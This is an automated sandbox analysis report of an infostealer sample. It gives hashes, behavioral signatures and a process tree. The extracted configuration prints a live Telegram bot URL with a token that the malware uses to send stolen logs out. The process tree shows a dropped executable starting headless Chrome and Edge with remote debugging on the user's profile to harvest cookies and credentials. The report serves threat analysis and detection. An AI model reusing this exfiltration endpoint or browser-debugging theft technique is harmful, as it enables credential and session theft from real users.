Analysis
-
max time kernel
131s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
08/04/2025, 07:42
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe
-
Size
5.7MB
-
MD5
cd553ce7a31bac1a44b761dd831b1089
-
SHA1
a54f6d76cc6576e661ac793b085aa2da04f57349
-
SHA256
a808f1f3c67e9ce64442115e902b375f4b30628359460a284d05ab2d0fdbcea9
-
SHA512
00a85f996c40fd76bef66b0678a1572e993991267aa44bf80359a9a264b97c22943ca5f4d1adfbc55f0d634185de97ccbbde1a6f4551694f6e56461a08db7cca
-
SSDEEP
98304:kWl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UczF:ktOuK6mn9NzgMoYkSIvUcwti7TQlvcik
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7985592397:AAFVMPiVHwyHikIzOgkAVrO_09lBQbg0bYY/sendDocument?chat_id=5279643894&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20212.102.63.147%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Uses browser remote debugging 2 TTPs 12 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2684 chrome.exe 5816 msedge.exe 3584 msedge.exe 2764 msedge.exe 5756 msedge.exe 1996 chrome.exe 4872 chrome.exe 5100 chrome.exe 2000 chrome.exe 5488 chrome.exe 1780 msedge.exe 4468 msedge.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation tempdatalogger.exe -
Executes dropped EXE 1 IoCs
pid Process 1280 tempdatalogger.exe -
Loads dropped DLL 2 IoCs
pid Process 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 1280 tempdatalogger.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 26 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3584 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 tempdatalogger.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier tempdatalogger.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4468 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133885717811255283" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1996 chrome.exe 1996 chrome.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe 1280 tempdatalogger.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 1996 chrome.exe 1996 chrome.exe 1996 chrome.exe 1996 chrome.exe 1996 chrome.exe 5816 msedge.exe 5816 msedge.exe 5816 msedge.exe 5816 msedge.exe 5816 msedge.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe Token: SeDebugPrivilege 3584 tasklist.exe Token: SeDebugPrivilege 1280 tempdatalogger.exe Token: SeShutdownPrivilege 1996 chrome.exe Token: SeCreatePagefilePrivilege 1996 chrome.exe Token: SeShutdownPrivilege 1996 chrome.exe Token: SeCreatePagefilePrivilege 1996 chrome.exe Token: SeShutdownPrivilege 1996 chrome.exe Token: SeCreatePagefilePrivilege 1996 chrome.exe Token: SeShutdownPrivilege 1996 chrome.exe Token: SeCreatePagefilePrivilege 1996 chrome.exe Token: SeShutdownPrivilege 1996 chrome.exe Token: SeCreatePagefilePrivilege 1996 chrome.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1996 chrome.exe 5816 msedge.exe 5816 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4788 wrote to memory of 2764 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 89 PID 4788 wrote to memory of 2764 4788 2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe 89 PID 2764 wrote to memory of 3064 2764 cmd.exe 91 PID 2764 wrote to memory of 3064 2764 cmd.exe 91 PID 2764 wrote to memory of 3584 2764 cmd.exe 92 PID 2764 wrote to memory of 3584 2764 cmd.exe 92 PID 2764 wrote to memory of 772 2764 cmd.exe 93 PID 2764 wrote to memory of 772 2764 cmd.exe 93 PID 2764 wrote to memory of 4468 2764 cmd.exe 95 PID 2764 wrote to memory of 4468 2764 cmd.exe 95 PID 2764 wrote to memory of 1280 2764 cmd.exe 98 PID 2764 wrote to memory of 1280 2764 cmd.exe 98 PID 1280 wrote to memory of 1996 1280 tempdatalogger.exe 100 PID 1280 wrote to memory of 1996 1280 tempdatalogger.exe 100 PID 1996 wrote to memory of 5008 1996 chrome.exe 101 PID 1996 wrote to memory of 5008 1996 chrome.exe 101 PID 1996 wrote to memory of 1940 1996 chrome.exe 102 PID 1996 wrote to memory of 1940 1996 chrome.exe 102 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 640 1996 chrome.exe 103 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104 PID 1996 wrote to memory of 2208 1996 chrome.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-08_cd553ce7a31bac1a44b761dd831b1089_black-basta_hijackloader_luca-stealer.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5FE3.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp5FE3.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:3064
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4788"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:772
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:4468
-
-
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff841f9dcf8,0x7ff841f9dd04,0x7ff841f9dd105⤵PID:5008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2128,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2124 /prefetch:35⤵PID:1940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2088,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2096 /prefetch:25⤵PID:640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2512,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2508 /prefetch:85⤵PID:2208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2912 /prefetch:15⤵
- Uses browser remote debugging
PID:2684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3080 /prefetch:15⤵
- Uses browser remote debugging
PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4272 /prefetch:25⤵
- Uses browser remote debugging
PID:5100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4612 /prefetch:15⤵
- Uses browser remote debugging
PID:2000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5284,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:85⤵PID:2164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5376,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:85⤵PID:4468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5316,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5396 /prefetch:85⤵PID:696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5628,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5532 /prefetch:85⤵PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5492,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5416 /prefetch:85⤵PID:3020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5640,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5308 /prefetch:85⤵PID:4104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5776,i,5134971965444440209,16811741607207919322,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5460 /prefetch:15⤵
- Uses browser remote debugging
PID:5488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --disable-gpu4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5816 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x248,0x24c,0x250,0x244,0x258,0x7ff8402ff208,0x7ff8402ff214,0x7ff8402ff2205⤵PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2276,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:35⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2236,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:25⤵PID:6080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2500,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2496 /prefetch:85⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:15⤵
- Uses browser remote debugging
PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3592,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:15⤵
- Uses browser remote debugging
PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4164,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:15⤵
- Uses browser remote debugging
PID:2764
-
-
